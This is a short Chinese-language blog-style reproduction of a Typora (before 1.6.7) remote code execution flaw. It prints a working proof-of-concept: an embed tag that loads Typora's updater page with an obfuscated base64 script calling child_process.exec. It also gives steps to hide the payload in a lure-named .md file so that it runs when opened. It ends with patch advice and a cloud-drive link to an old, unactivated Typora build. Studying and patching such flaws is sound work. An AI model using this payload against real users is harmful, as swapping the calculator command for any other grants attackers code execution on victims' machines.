1.漏洞介绍
Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以通过加载定制的markdown文件实现任意javascript代码执行。
2.影响版本
Typora < 1.6.7
3.漏洞复现
我使用的Typora版本是1.5.10,未激活,文章下面有作者使用的Typora工具分享
然后在渗透安全团队拿来POC
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
Base64解码:reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])
1.新建一个txt文件写入POC,再将后缀名改为.md格式
2.用Typora打开车模照片.md文件,进入后点击一下鼠标左键即可触发代码执行,打开计算器
4.修改建议:
目前厂商已发布升级补丁以修复漏洞
防止钓鱼,不看不用md文件
5.工具获取
Typora1.5.10版本夸克网盘链接
链接:https://pan.quark.cn/s/4f8ebd30d5c0
提取码:9pht